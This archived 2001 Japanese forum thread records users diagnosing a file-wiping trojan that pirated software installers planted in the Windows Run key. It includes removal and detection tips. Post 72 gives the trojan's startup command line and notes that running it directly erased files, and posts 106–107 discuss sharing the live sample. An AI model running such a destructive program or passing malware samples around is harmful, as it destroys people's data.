5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

HDぜんぶ消去した上ズタズタに!!ウィルス

1 :名無しさん@お腹いっぱい。:01/09/28 16:43
やられた!!
nimdaどこでない!
昨日の晩、突然HDが見る間に全て消去されていき、さらには共有先のマシン3台までやられた。
ファイナルディスクで、画像ファイル1枚だけ助かったけど、あとはデータが33バイトごとにズタズタに...
原因は、メールか不正アクセスか定かでないが、いきなりメディアプレーヤーを更新するメッセージが出て、その直後のこと。
IPAに問い合わせでも、そんな報告はないとのとこ。
いったいナニ?!
ネタではないです。しんけん情報ください!

2 :名無しさん@お腹いっぱい。:01/09/28 16:45
vote?

3 :名無しさん@お腹いっぱい。:01/09/28 16:47
voteナニ?

4 :名無しさん@お腹いっぱい。:01/09/28 16:49
ttp://www.trendmicro.co.jp/virusinfo/default3.asp?VName=TROJ_VOTE.A

5 :名無しさん@お腹いっぱい。:01/09/28 16:54
そうかも...これの進化形かも。
対処は?

6 :名無しさん@お腹いっぱい。:01/09/28 17:00
             /∧        /∧
           / / λ     / / λ
          /  /  λ   /  /  λ
        /   /  /λ /   /  /λ
       /    / / //λ    / / //λ
     /            ̄ ̄ ̄      \
    /                         λ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   /                          /λ < 知るか、ヴォケ!
  /              ∧     ∧       /λ  \________
  |          ●   λ ` ー― ´/  ●  / /|
 |               λV V V V/       / //|
 |               λ|   |/      / / //|
 |                λAA/       / /////
  |                 λ/     / / ////|
  \                    ////// /////
   \               ////// ////////
     ―         // // /////////////
       ヽ        ///////////////
         \       ///////////
          \     /////////
           \     //////
             \     /
               (    )
               | | |
               (__)_)

7 :名無しさん@お腹いっぱい。:01/09/28 18:01
VB製か・・・・・・・・・・・・・・・・・・・・

8 :名無しさん@お腹いっぱい。:01/09/28 19:47
バラバラになったデータは復旧サービスで直るのかなぁ

9 :名無しさん@お腹いっぱい。:01/09/28 19:57
     うわ〜ん、感染から10日たったよ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            Λ_Λ
          ( ゜∀⊂ヽ ニヤリ
          ⊂    ノ
           人  Y
          し (_)
http://www.zdnet.co.jp/news/0109/28/e_nimda.html

10 :名無しさん@お腹いっぱい。:01/09/28 20:19
こんなのも有るぞ。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.vote.b%40mm.html
VOTEの亜種VOTE.B。添付ファイル自体はexeだが、.vbs3個生む。
詳細は見て見れ。

それより、>>1はパッチ当てて有るのか?NIMDA対策の。

11 :このスレ見てたらよかったのに:01/09/28 20:35
一応最新か?TROJ_VOTE.Aスレッド
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001500947

12 :名無しさん@お腹いっぱい。:01/09/28 20:48
Symantecは9/18に定義ファイルを出しているようだ。
おそらくトレンドも同じくらいの時期に対応してると思われ。
パッチ当てたり、定義ファイルの更新等、気をつけてれば防げたはず。

ここに出入りするような人間が、なぜそんなことを怠るかよくわからん。

13 :名無しさん@お腹いっぱい。:01/09/28 21:26
http://www.symantec.com/avcenter/venc/data/w32.vote.c@mm.html
今度はVOTE.Cだって。。。詳細わかったら書くって。。。

凄いなZaCkErって奴。かなーり厨房。
そんなに有名に成りたいかね。。。

14 :名無しさん@お腹いっぱい。:01/09/28 21:34
>>12
自業自得なのはわかってるのだけど、古い5.00を使っていたので、へいきと油断してた...
今復旧サービスに問い合わせ中だけど、100万くらいかかるそうな...
しかもデータが、こまかく断片化されているので、かなり困難らしい。

15 :名無しさん@お腹いっぱい。:01/09/28 21:36
>>10
ありがと。
さっそくみてみる

16 :名無しさん@お腹いっぱい。:01/09/28 21:49
>>10
今DOSで立ち上げてみてみたら、ネットに直接つながっていたマシンは全ディスク0バイトだった。
vbs3もなんもなし。カラポ
IPAにもそんな報告はないって

17 :10:01/09/28 22:05
>>16
なんなんだ。。。ソレは。唖然。
証拠、、、残って無いって事か。。。
33バイトごとゴミ書き込むって。。。なんかのウイルスみたいでは有るな。。
http://vbc.trendmicro.co.jp/vbc/vinfo/vdb/vbcdefault3.asp?VName=PE%5FMAGISTR%2EB
#↑MAGISTRっぽいな。。。。何気に。。
1)ファイル感染活動:
 ウイルスはすべてのローカルドライブ、ネットワークドライブ、共有フォルダから "WinNT",
"Windows", "Win95", "Win98","WinME","Win2000","Win2K","WinXP"  という名前のディ
レクトリを検索します。そして検索されたディレクトリ内にあるすべての拡張子.EXEもしくは
SCRでPE形式の実行可能ファイルに自身のウイルスコードを追加して感染します。ただし、以下
の条件のファイルには感染しません:
 ・ファイル名の最初2文字が同じ文字のファイル:例"AABCD.exe"
 ・ファイル名に"GRPC"という文字列を含んだファイル例"grpconv.exe"
 ・ファイルサイズが 16,777,216Bytesを超えるファイル

改変されたNTLDR"と"WIN.COM"は実行されると"プライマリのハードディスクを上書してデータを
破壊してしまいます。"NTLDR"はWindowsNT/2000の、"WIN.COM"はWindows9x/Meのシステムファ
イルであり、Windows起動時には必ず実行されます。つまり、次回Windows再起動時にハードディ
スク内のデータがすべては破壊されることになります。
#・・・nimda騒ぎで影薄かったけど、コレはかなり危険。

18 :名無しさん@お腹いっぱい。:01/09/28 22:14
>>17
危険度としてはnimdaより上だと思う。
voteでもないような気がする。
しかも証拠が残ってないので不正アクセスかメールなのかも特定できない。
再起動はしてないけど、ログオンは症状が出る直前にし直したので、きっかけはログオンも考えられるかも。

19 :17:01/09/28 22:27
破壊ルーチン組んだ奴は必然的に感染広げられないから、認知度は低く成るけど
他にも多種多様。単純なバッチウイルスからある。
・・・何とか重要データだけでも復帰できること祈る。。。>1=18?

しっかし、IPA、報告無しって。。。調べて見るって言えないのかね。
・・アソコ、情報遅いし糞の役にも立たん。。。

20 :名無しさん@お腹いっぱい。:01/09/29 02:17
>>17
1=18?そうです。
先週の日曜にフレッにしたばっかりなのですが、もっと慎重になるべきでした。
復旧の情報に関しては問い合わせ中ですが、どこもたっかいのですね。
とても個人ではまかなえない。
IPAも唯一の公的機関だって聞いてたのに、なんか反応わるいし。
せめて原因を特定してほしい。

21 :名無しさん@お腹いっぱい。:01/09/29 02:42
社内で酔狂な奴がいて、どうでもいいPCをオフラインにしてわざとvoteの症状発生させたとの一報がありました。
今、詳しく聞いているけど、比較すると1さんのケースがvoteかどうか判断の参考になるかもしれませんので、わかり次第、ここに書きます。

こんなに深刻なケースもあるのに、「システム部門は29日のニムダ再発症に備えよ!!」と騒ぎを楽しむ若手や重役の厨房が会社で幅をきかせている。
「マスコミで話題騒然のワーム」で危機管理ごっこして遊んでる暇があったら、地味でも深刻な破壊活動するやつに備えたいんだよ、現場としては。
どこの会社もそうなのかな?

22 :名無しさん@お腹いっぱい。:01/09/29 15:57
>>13
>凄いなZaCkErって奴。かなーり厨房。
>そんなに有名に成りたいかね。。。

ZaCkErって誰ですか。ID表示されてないんですけど。

23 :名無しさん@お腹いっぱい。:01/09/29 19:02
こんなのもあるらしい
http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci

24 :名無しさん@お腹いっぱい。:01/09/29 23:03
>>21
ありがとうございます。
詳細お待ちしています。
症状としては、見る間にディスクトップのアイコンが消えていき、すべてからっぽに。
メッセージは、なにもなし。
FAINALDATAでデータ復旧したところ、ファイル名は見えるものの、データがすべて33バイトに断片化されていました。
イメージとしては、データを全て消去した後、シュレッターにかけてズタズタにする感じです。
もっとも重要なデータが5ギガあるのですが、復旧サービスにたのんだ場合最低でも85万程度かかるらしいので、なんとか自力で復旧しようと思っています。
FAINALDATAエンタープライズをためしてみたいのですが、9万5千円って、けっして安くないので、思案中です。

25 :名無しさん@お腹いっぱい。:01/09/29 23:05
トレンドマイクロのファイル復旧ソフト試した?

26 :名無しさん@お腹いっぱい。:01/09/29 23:21
やられました。
深夜にリブートかかったまま、何らかのループ状態でBIOS暴走?して
マザーが逝きました。
LAN上の共有のPCのほうは、ノートンの更新ファイルがデリられてるし
あと気が付いた点は、ネットワーク設定が壊れている事
NetBEUIが消えていました。
共有していなかったPCは無傷。
感染源は不明。

27 :名無しさん@お腹いっぱい。:01/09/30 00:14
1枚だけ助かった画像ファイルって気になるな

28 :名無し:01/09/30 00:18
感染源を早く教えてくれよ。
不安じゃないか。

29 :名無しさん@お腹いっぱい。:01/09/30 00:33
ログオンと同時にWindowsシステムフォルダを消すなんておかしくないか?
システムファイルにはOSレベルでロックがかかってるはずだろう。

30 :名無しさん@お腹いっぱい。:01/09/30 00:38
>>21
voteが落す実行体って、vbsでしょ。
つまり、WTC.exe実行して、ドロップされた
MixDaLaL.vbs/DaLaL.VBS/WaiL.VBSをばtxtに拡張子変えて
VB詳しい奴にソース見せれば、何しようとしてるかはおおよ
そ解るんでない?破壊活動については。結局スクリプトな訳
だし、そのまま見れる筈。暗号、ポリモーフィック噛まして
なければ。んで、再起動する前に手動で書き換えられた値直
しとくと。
スコーシ安全な方法。

31 :名無しさん@お腹いっぱい。:01/09/30 00:51
>>29
では問題です。
OSレベルでロックがかかっているファイルをOSレベルで
削除したらどうなるでしょう?(藁

32 :名無しさん@お腹いっぱい。:01/09/30 01:02
>>30
でも他人のVBソースなんて読みたくない(w

33 :名無しさん@お腹いっぱい。:01/09/30 01:08
>>32
特に、厨房の書いたソースなんて??(w

34 :名無しさん@お腹いっぱい。:01/09/30 01:27
http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci

35 :名無しさん@お腹いっぱい。:01/09/30 01:37
ずいぶん前に他のスレでこの話題が出てるぞ。

http://ton.2ch.net/test/read.cgi/sec/997350129/601-700

ここの638以降。
つーか俺もやられたんだけど。

FINALDATAエンタープライズは、体験版があるから
それを試してみるといいよ。

36 :名無しさん@お腹いっぱい。:01/09/30 01:39
それと、感染源として濃厚なのは、
割れ物ソフトのインストーラー(or 実行ファイル)。
前のスレではそれが原因の人が何人か居た。

37 :名無しさん@お腹いっぱい。:01/09/30 01:44
>>24
>イメージとしては、データを全て消去した後、
>シュレッターにかけてズタズタにする感じです。

というよりは、
ファイルサイズを33バイトに変更した後、消した、
って事でしょ。

38 :名無しさん@お腹いっぱい。:01/09/30 01:59
>>36
たださ、>1が、共有先までやられてるって言ってる事は、純粋にローカルドライブだけ
消す訳じゃ無いって事でしょ。。
LAN通じて共有ドライブまで消すフォーマッタ、有ればそれかも。

何気にメディアプレーヤー立ったのがスゴーク気になる>1
NIMDAのreadme.eml改変して同じ原理で??.exe実行させる形にするのは可能。
やり方解れば中学生でも可能と思われ。あとは何を組み込んで実行させるか。

39 :名無しさん@お腹いっぱい。:01/09/30 02:52
>>35
ものすごく有益な情報です!
ありがとうございます!
今スタンドアローンなPCを用意したので、原因を探ってみます。
サーバにメールが残ってるので。
何かわかったら、また書きこみます。

40 :名無しさん@お腹いっぱい。:01/09/30 03:02
>>39
そうそう、それと、ファイナルデータのEメール版を買って使ってみたら、
ある程度はメールが復活できたよ。
確か体験版もあったので、試してみるといいかと。

そちらの情報も教えてください。
何か、怪しいクラックソフトなどをセットアップしたり、実行した覚えはありますか?
俺もまだ感染源を特定できてないので、どんな情報でも欲しい。

あと、名無しさんじゃわかりにくいから名前を「1」とかにしたほうがいいのでは?

41 :sky:01/09/30 17:00
セキュ板かソフトウェア板にノートンゴーストを入れたいなんかのスレにこのこと
についての言及があった。かなり詳しく書いてある。前にここでもこのことで騒ぎ
があった。二ヶ月も前の話だが。
この件でどうもおかしいのはMX。これをしている人に限って、何もしていないのに
消えるだの、制御できんあという事態が頻発した。
しかし、なぜかみんな少しの間騒ぐと、話題が消えてしまう。このことが何件かこの掲示板
であったので、なにかあるのではなんて思っている。
ちなみに、人によっては、IMをいれた人が訳のわからんIMを送り返され、再起動をかけたら、
すべて、このやり方で消されていた。ということもあったらしい。別にへんなファイルを起動
しなくても、ただ、つないでいるだけで、MXをしたら、消されていたことあったそうな。
ちなみにこれにはfinaldataはエンタープライズ版でも効果はない。上書きされたような感じで、
本職のサルベージですら、まず復旧は不可能だと聞いている。また基本性能は実はやすいものも
高いものも関係なく、ディレクトリのファイルを直接出せるかどうかしかない。
過去に何度かこれはでたが、この関連はほとんど過去ログにしかない。
参考になりましたか。
あと、ほとんど話題にはでてこないが、これは、過去にはMX関連でしか話が出てこないため、
表にでにくいようなのだ。

42 :名無しさん@お腹いっぱい。:01/09/30 17:26
そいやこんなのもあったね。
http://www.wg7.com/wg09fbdocs/setsumei.html

43 :1:01/09/30 18:00
その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

44 :名無しさん@お腹いっぱい。:01/09/30 18:42
>>41
>ちなみにこれにはfinaldataはエンタープライズ版でも効果はない。

>>35のスレでは、ある程度復旧できた人が居たよ。
あと、ファイナルデータのEメール版で俺はメールを少し復旧できた。

45 :名無し:01/09/30 19:36
ゾヌ入れておけば、MXのバックドアから入られないので
大丈夫ですか?

46 :名無しさん@お腹いっぱい。:01/09/30 20:26
セキュ物のわれずはやめよう

47 :名無しさん@お腹いっぱい。:01/09/30 22:05
FATであればエンタープライズ版で復旧できる可能性が高いのではないだろうか?
NTFSは、情報なし。

48 :1:01/10/01 20:48
1です。
いろいろ情報ありがとうございました。
とても参考になりました。
MX、実は思いっきり心当たりあります。
コトの起こる1日前に、MXを入れたばかりでした。
さすがに、入れてすぐは共有をきっておいたのですが、半日なにも問題なかったのでLANをつなげました。
わたしの場合、MXがらみが原因なのは間違いないでしょう。
ちなみに、サーバに残してあったメールはなにも問題なし。
不正アクセスも、まめにフレッツを切っていたのでないと思います。
FAINALDATAエンタープライズ版は、購入するつもりです。
アルファオメガに問い合わせたところ、FATでいけるならNTFSでも可能性は高いとのこと。
PSDや、JPGなどのメジャーなデータは登録してあるので、かなりの確率で復旧できるらしいのですが、わたしのデータは3DのOBJECTデータなので望み薄でしょう。
だめもとでトライしてみます。
ファイルのヘッダー情報などはわかっているので、自分でデータベースに登録することができれば復旧できる確率はたかいのですが...
いろいろ自分でためしてみるつもりなので、また情報があれば書き込みます。

49 :名無しさん@お腹いっぱい。:01/10/01 21:51
>>48
MXを共有していただけで、今回の現象が起きましたか?
1日でどんなものを落として(拡張子など)、
どんな作業をしましたでしょうか?(EXE実行?MPEG再生?)
再生した場合は、どんなツールで再生しましたか?
その辺を出来るだけ詳しく教えてください。

前にも書きましたが、ファイナルデータエンタープライズを買う前に
試用版でテストをしてみたほうが良いですよ。
アルファオメガのページにエンタープライズの試用版があります。
私は、それでFATもNTFSも試しましたが、ダメでした。

3Dですか・・・Lightwaveのクラックとか落としてインストールしたりは
していませんか?

50 :名無しさん@お腹いっぱい。:01/10/01 21:55
仮に、クラックソフトを落としてインストールしていたとしても、
みんなあなたを責めたりしませんので、正直に教えてください。
今は皆、この現象の発生条件を知りたいのです。

51 :名無しさん@お腹いっぱい。:01/10/02 17:56
エンタープライズ版どこにもないよー
土曜にはたくさんあったのに。

52 :名無しさん@お腹いっぱい。:01/10/03 00:14
エンタープライズ版でいける場合といけない場合があるということは、
MXがらみの削除するウィルスが複数存在するということか?

53 :名無しさん@お腹いっぱい。:01/10/03 00:32
恐ろしいのう。

54 :名無しさん@お腹いっぱい。:01/10/03 00:41
ってか、クライアント同士のp2pファイルシェアリングって、今時海外の一番や
ばそうなxx街で立ちんぼ引っ掛けてゴム無しで遣りまくるみたいなもんでしょ。
漏れは、binエディタで開いて不信な部分見分けるスキルなんて無いから手は出
せないけど。
ツワモノはニオイで解るらしいけど、、、香水バリバリなら解らんぞキット。

55 :名無しさん@お腹いっぱい。:01/10/03 00:47
>>54
悪気が無くても自然に感染するものでもあるまい。
ずいぶんわけは違うのでは。

56 :54:01/10/03 00:56
>>55
原理考えると怖いのよぅ。。。
漏れ、鼻利かないし。。。
見てくれに騙されてスグ手出すし。
MX自体、バグ報告って盛んにされてるの?
というか、ブートウイルス絡むとどうしようも無いんじゃ?。。。

57 :1:01/10/03 02:58
>>49
AdobeStreamlineです。
症状がでたのは、インストール直後でなく翌日でした。
再起動はしてないから、たぶんきっかけはログオン。
それとどういうわけか、本当にエンタープライズがどこも売り切れです。
先週まではどこにでもあったなのに。
いま評価版でスキャン中ですが、何時間もかかりそうです。

58 :名無しさん@お腹いっぱい。:01/10/03 03:06
>>57
やはりソフトをインストールしてたんですね。
間違いなく原因はそれですね。

今回の症状は、あるソフトをインストールした後の
再起動(もしくはログオン)後に発動する、というものです。
おそらくウイルスではなくて、
スタートアップに登録される1個のアプリケーションなんでしょうね。

もう1つ質問ですが、インストーラーで入れましたか?
それとも、単にアプリケーションを実行しましたか?


>いま評価版でスキャン中ですが、何時間もかかりそうです。

私は200GBくらいあったので、40時間くらいかかりました・・・

59 :名無しさん@お腹いっぱい。:01/10/03 03:33
まさに>>35さんの言っていたスレの通り
僕はそのスレの660です
僕の場合は"Dimensions 3 J"です
このソフトは、落とした圧縮ファイル&解凍したファイルをスキャンしても、ウィルスソフトに引っかかりません
何度か実験した結果、スタートアップにフォーマットプログラムが組み込まれていたようです
このタイプは、アンチウィルスソフトでは対策不能に近いです
インストール後に「START and STOP」 などのスタートアップ監視ソフトで監視することですね

60 :名無しさん@お腹いっぱい。:01/10/03 03:35
ちなみにまだ大事に持ってますよ(w
大事な実験道具ですから

61 :名無しさん@お腹いっぱい。:01/10/03 03:41
割れ物を扱う以上、このぐらいは覚悟の上でやるように
俺も割れ物に手を出してるが、やはりインストールするときは緊張する
今まで3回もやられて、FDISKからやり直してる
ちなみにウィルスソフトはすべてすり抜けられてしまった
割れ物ってのはそういうモノなんだよ

62 :59:01/10/03 03:43
あ、なんか紛らわしい書き方になっちゃいました
僕は>>1さんではありません
ただあまりにも同じ境遇だったもので

63 :名無しさん@お腹いっぱい。:01/10/03 03:43
>>61
>割れ物ってのはそういうモノなんだよ

ここでそんな偉そうな説教を聞きたい人なんて一人もいません。
有益な情報を書き込むのならばともかく、無駄な書き込みはやめましょうね。

64 :名無しさん@お腹いっぱい。:01/10/03 03:45
>>59
インストール後、レジストリのスタートアッププログラムを見ても
何も姿は見えないのでしょうか?

OSは98でも2000でも同じですか?

65 :61:01/10/03 03:46
>>63
別に偉そうに説教してるつもりはないが
おもいっきり自分を卑下してるけど

66 :名無しさん@お腹いっぱい。:01/10/03 03:49
>>64
2000のみで確認
今ちょっと実験用のPCが使えないので、98の確認はいつになるかわかりません
レジストリを直接見てないですけど、監視ソフトで確認できました

67 :61:01/10/03 04:00
今、自分のレスを読み直してみたが、
確かにかなりウザイな
悪かった、
原因が原因だけに、ちょっと熱くなってしまったようだ
ごめんな
>>1

68 :名無しさん@お腹いっぱい。:01/10/03 04:08
>>66
>監視ソフトで確認できました

そうなんですか。
ではインストールされているディレクトリなどもわかるのですか?
もし毎回同じ場所だったら対策出来そうですね。

とても役立つ情報ありがとうございます。

69 :名無しさん@お腹いっぱい。:01/10/03 05:02
WinMX自体が問題なのかもって可能性は?
>>1はWinMXをどこから入手したの?本家サイト??

70 :名無しさん@お腹いっぱい。:01/10/03 05:05
■ 初心者用質問スレッド Part III ■
>>69
こっちきて!

71 :名無しさん@お腹いっぱい。:01/10/03 09:49
友達の話だが、このあいだそいつもHDの中身が消えうせたらしい。
やはり、MXでおとしてきた割れを入れた結果だそうだ。
そいつはパーティションくぎってたため、
幸い消えたほうは重要なほうではなかったらしく、
最悪の事態はさけられたといってた。
これもたぶん同じ原因だよね。

72 :名無しさん@お腹いっぱい。:01/10/03 15:50
>>68
昨夜は夜遅くなって寝てしまい、レスが遅れてしまいました
で、ご質問の件なんですが、
僕が何回かインストールしたとき、
その症状をメモってたのでここに書いてみますね

ソフト:Adobe dimensions 3.0J シリアル無しをインストール後
先ほどの「START STOP」っていうソフトで見たときにこういう表示が出る

Whistler  | Machine Registry | C:\WINNT\System32\whismng.exe -next

ソフトでこのプログラムを無効にしたら、再起動しても問題なし
次に、直接このプログラムを実行したらHDがガリガリいいながらファイルが消えていきました
ちなみに、LANでつないでるPCには影響ありませんでした

どうでしょう?参考になるかな?

73 :名無しさん@お腹いっぱい。:01/10/03 18:56
>>72
おぉ!すごい!
プログラム名までわかるとは凄い情報ですよ。

で、whismng で検索して調べてみました。

以下のようなものらしいです。

--------
The program or trojan is called "Microsoft Windows XP & Office XP Unused Serial Number Generator"

Chuck just opened it and then looked into exe file. Then I
saw the sentence "You did a piracy, you deserve it."
He claims it will delete all your files after your computer is rebooted.

If someone already executed this program, do not reboot the computer. Open regedit and go to:
--------
エキサイト翻訳
プログラムかtrojanは「マイクロソフト・ウインドウズXP&オフィスのXPの未使用
のシリアル番号ジェネレーター」と呼ばれます。チャックはそれをちょうど開き、
次に、exeファイルを調査しました。その後、私は文を見ました「著作権侵害を
行いました、それに相当する。」彼は、あなたのコンピューターがリブートされた
後それがあなたのファイルをすべて削除するだろうと主張します。
誰かが既にこのプログラムを実行した場合は、コンピューターをリブート
しないでください。regeditを開いて、次のものに行ってください:
HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun。そこから、
whismng.exeへの言及を削除してください。
--------

もう少し調べてみます。

74 :名無しさん@お腹いっぱい。:01/10/03 19:17
>>23
に書いてある、これに間違い無さそうですね。

http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci

75 :名無しさん@お腹いっぱい。:01/10/03 19:18
でも、うちはこんなメッセージは出なかったな・・・
亜種か?

You did a piracy, you deserve it.

76 :名無しさん@お腹いっぱい。:01/10/03 19:31
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

シマンテックにも情報あり。

72さんのおかげで一気にここまでわかりました。

ところで、ウィルスソフトをスルーしたというのは、
9月24日以前だったからでしょうか?

なんにしても、かなり最近発見されたものなんですね。

77 :名無しさん@お腹いっぱい。:01/10/03 20:44
>>76
落としてきた圧縮ファイルや、解凍して出てくるファイルをスキャンしても、ウィルスを検知しません
今試してみたら、9/27のNortonの定義でも同様でした

プログラムのセットアップ完了後に、システムにウィルスが組み込まれるので、インストール後なら検知できるでしょうね
ただ、インストール後、再起動やログオフしてしまうと、次回起動時にHDが逝っちゃいますので
インストール後、再起動前にスキャンする必要があるでしょうね
もしくは、何らかのスタートアップ監視プログラムを常駐させておくかでしょうね

僕が思いつく対策といえばこれぐらいしかありません
ついうっかりスキャンし忘れて再起動してしまったとき、取り返しがつかなくなるので
僕は監視ソフトを使ってますが

78 :1:01/10/03 20:45
http://www5.justnet.ne.jp/~ttp/

79 :名無しさん@お腹いっぱい。:01/10/03 20:54
>>78
有料エロサイトへのリンク

80 :名無しさん@お腹いっぱい。:01/10/03 21:10
結局、割れもんにソース弄って組み込んで有るって事ぢゃねーのか??

81 :名無しさん@お腹いっぱい。:01/10/03 21:36
>>80
正確には、割れ物のインストーラーね。
割れ物本体に入っているわけじゃない。

82 :名無しさん@お腹いっぱい。:01/10/03 23:11
もう一つ見分け方があるのを忘れてました
解凍して出てきたファイルの日付を見る方法です

Setup.exeの日付だけが異様に離れている場合、Setup.exeだけ後から手を加えられたモノだとわかります
さっきから何度も出てきてる(w Dimensions 3.0J を見てみると
他のファイルは1996年とか1997年なんですが、Setup.exeだけは2001/8/23となっています

こういうセットアッププログラムを見かけたら警戒した方がいいかもしれません

83 :80・を!http:01/10/03 23:12
>>81
んま、インストーラだろね。
該当割れソフト関連のレジストリにソフト起動と同時に起爆させる値書き込んだり。
割れ物手出す人は正規品の設定する正常なレジストリ値なんて知らないし。
タイマー入れて何度か使って安心してから起爆も有りだろうし。

前に割れ物ROMグラフィクソフトに手出して痛い目見た漏れ。。。ウイルスチェクは
ROM自体に当然掛けたさ。
せめて、手出す前にインストーラぐらいはダンプ取って不信な兆候見つけなきゃ。
ってか、そんなスキル漏れには無いけど。

84 :名無しさん@お腹いっぱい。:01/10/04 00:06
>>83
>ソフト起動と同時に起爆させる値書き込んだり。

いや今回の場合は、スタートアップね。
いままでに出てるリンクをよく読んでみ。

単純明快に、インストーラーによってフォーマットプログラムが
インストールされて、それがスタートアップに登録されるだけ。
まったくもってシンプル。

85 :名無しさん@お腹いっぱい。:01/10/04 00:12
>>84
シンプルだけど、なかなか効果的

86 :名無しさん@お腹いっぱい。:01/10/04 00:16
>>85
「なかなか」、どころじゃなくって効果は「最高」でしょう。

87 :名無しさん@お腹いっぱい。:01/10/04 00:18
ところで、

”割れ物ROMグラフィクソフト”

って何だ?
割れ物グラフィックスソフト、ならわかるけど、
なぜ間にROMが入る?エミュレーター?

88 :名無しさん@お腹いっぱい。:01/10/04 00:19
Shiftキーで解除できるから「最強」じゃない。

89 :名無しさん@お腹いっぱい。:01/10/04 00:19
あ、CD-ROMの事か?

90 :名無しさん@お腹いっぱい。:01/10/04 00:20
>>88
まぁ最高かどうかなんてどうだっていいよ。

91 :83:01/10/04 00:43
>>89
そゆ事です。
フォーマットまでは行かなかったけど。。何か常駐してリソース食ってる気配
ぷんぷん。入れてからハングの嵐出まくり。グラフィクソフト動かさなくても。
多分フォト署プか苛ストレタが怪しかった。。結局原因不明。んな知識その頃
無かったし。
スタートアプとしてHKEY〜〜〜CurrentVersion\Runの値は、いかにもで嫌い。
つまり、起動時実行要求する奴で無い場合はココの書き込み確認すれば良いで
しょ。グラフィクソフト、起動時スタートは先ず無いし。
再起動前に必ず確認。
それでも、該当ソフトの動作に関連付けられてればアウト。
それと、セキュリティ関係の場合は当然起動時スタートさせなきゃだから一番
危険と思われ。レジストリ以外にも.iniとか色々だし。。

92 :名無しさん@お腹いっぱい。:01/10/04 01:10
原因もほぼ特定でき、対策法も出そろった様子
けっこう綺麗にまとまりましたね
もっと混沌としたスレになるかと思いましたが。。。

93 :名無しさん@お腹いっぱい。:01/10/04 01:19
ひとつ疑問が残るのは、FINALDATAエンタープライズで復旧できるケースと、
できないケースがあるのはどうして?

94 :名無しさん@お腹いっぱい。:01/10/04 01:45
72さんのおかげで、話が具体的にまとまりました。
前スレからいる私としては原因がわかってうれしい限りです。

>>93
普通は、エンタープライズでも修復できないように思います。
ただエンタープライズには、ファイルサイズを変更する機能があるので、
それを使えばもしかして可能かもしれません。
といっても、1ファイルごとに手動でファイルサイズを入れていかないと
ダメなので、私はやめました。
元々のファイルサイズだって覚えてないし・・・

95 :名無しさん@お腹いっぱい。:01/10/04 01:52
友達の話で恐縮ですが、彼もデータをやられたみたいです。
データだけ消えててフォルダは残ってたらしいのですが(ウィンドウズは起動したみたい)
これもここに書かれていると同じ症状なのですかね?ちなみにMXで割れをやってたそうです。

96 :名無しさん@お腹いっぱい。:01/10/04 01:55
>>95
同じです。フォルダだけ残るのがこのウィルスの特徴です。

97 :名無しさん@お腹いっぱい。:01/10/04 01:56
ウィルスバスターのデータベースには、まだ載ってないようです。
ノートンのほうが早い。

98 :名無しさん@お腹いっぱい。:01/10/04 01:56
>>93
スコーシ、バグ有るんでない?
・・・いや、フォーマット掛けちゃう不正プログラムの方に。
後は、元の環境での断片化の程度とか?

横道それるけどwinのcryptAPI使ったウイルス存在してるのよ。
破壊というより全ファイルの暗号化なんだけど、ランダムにキー
生成してやるらしいの。
作者、バイナリ公開してるし。。。。メール添付のワームだけど。
復旧するにはフォーマットよりタチ悪いと思われ。

99 :95:01/10/04 02:02
>>35を読まずに書き込んでしまった。スマソ
とりあえずこの現象が起こった人はみなMXでDimensions 3 JをDLして
インストールしたのが原因と考えていいのでしょうか?

100 :名無しさん@お腹いっぱい。:01/10/04 02:04
>>99
どうせならもう少し読もう。このスレも含めて。

いろんな割れ物に入っているようだよ。
前スレでは、MXで落とした「午後のこ〜だ〜」にも入ってたらしい。

101 :95:01/10/04 02:25
>>100
レスありがとう。友達に報告しなければと思い焦ってしまいました。

102 :名無しさん@お腹いっぱい。:01/10/04 04:12
>>98
ちなみに、今回のはフォーマットじゃないよ。
「ファイルを0バイトに上書きした後、削除」を
全てのファイルに繰り返す。
だから、全ファイルを消すまでに比較的時間がかかる。

フォルダはそのまんま残して、ファイルだけを消す。

103 :名無しさん@お腹いっぱい。:01/10/04 17:23
以前モロやられた。ノートン入れてたが何の反応もなし
再起動したとたんHDがカリカリ言いながらひたすら
ファイル消して逝った・・・・。
未だ何のソフトか原因不明。

とりあえずファイナルデータ実行してみたが復旧出来たとしても
中身がかなりいじられていて使い物にならん
読取専用データはダメージ弱くてある程度は復旧出来たが・・・


コイツはかなり手強いゾ!
拾いモノはくれぐれも自己責任で・・・

104 :名無しさん@お腹いっぱい。:01/10/05 15:58
Adobe dimensions 3.0J
Adobe Streamline

これ以外で報告ないの?

105 :名無しさん@お腹いっぱい。:01/10/05 18:45
だからすぐ上に午後のこーだーって書いてあるじゃん。
ちゃんと読んでる?
あと、上のほうで紹介されてるスレも全部読んでみ。

106 :名無しさん@お腹いっぱい。:01/10/05 23:27
ウィルス本体と、セットアッププログラムをまだ持ってるのですが
これってWeb上に公開&配布したら犯罪になるんでしょうか?
プログラムとか全然わからないので、僕が持ってても意味無いのですが
詳しい人が見ると、何かわかるのかなと思いまして

107 :名無しさん@お腹いっぱい。:01/10/05 23:45
>>106
ほ、欲しい。。

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

mQCNAzuwyfwAAAEEAKkeECqWhSWNqqoq1F7yK1ZDxHZbqw7n6ElISVYXTNym3cfP
sZrWsZdpIUHftlGUzCVeiegzcDrexSyqwh8jggFyc7YbYa6//fX8FhNwI14+moTe
0tVi4K7rzW9lfgHGsckSpjqWKTOV/Jf/mGWpMtnErkh2lAA3j/DcqHrvSEgvAAUR
tAt0ZXN0IDx0ZXN0PokAlQMFEDuwyfzw3Kh670hILwEB71IEAIZo2oOpNuYX80V8
